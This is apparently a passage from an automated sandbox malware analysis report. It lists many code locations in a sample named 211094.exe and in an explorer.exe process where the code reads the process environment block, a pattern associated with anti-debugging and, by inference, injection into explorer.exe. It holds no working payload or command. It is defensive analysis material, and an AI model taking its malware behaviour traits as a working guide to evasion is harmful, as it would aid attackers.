      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E524A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E524A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E512ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E512AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B8B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EDB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EF358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E513B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E513B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EDB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5653CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5653CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E50DBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E512397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E59D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E514BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E514BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E514BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B5BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E500050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E500050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B1074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E567016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E567016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E567016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E57B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E57B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E57B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E57B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E57B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E57B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E563884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E563884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5290AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E50B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E50B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E504120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E504120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E504120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E504120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E504120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5741E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E512990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E50C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5651BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5651BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5651BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5651BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5669A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5161A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5161A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_00562D91 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_00564B44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_005657C5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_00564FE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B714FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B88CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B805AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B805AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B68DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B3A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B88D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ABAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B33540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B63D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B346A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B80EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B80EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B80EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B88ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B6FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B6FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ABE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ABC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ABC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ABC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B37794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B37794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B37794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADB73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADB73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4FF10 mov eax, dword ptr fs:[00000030h]
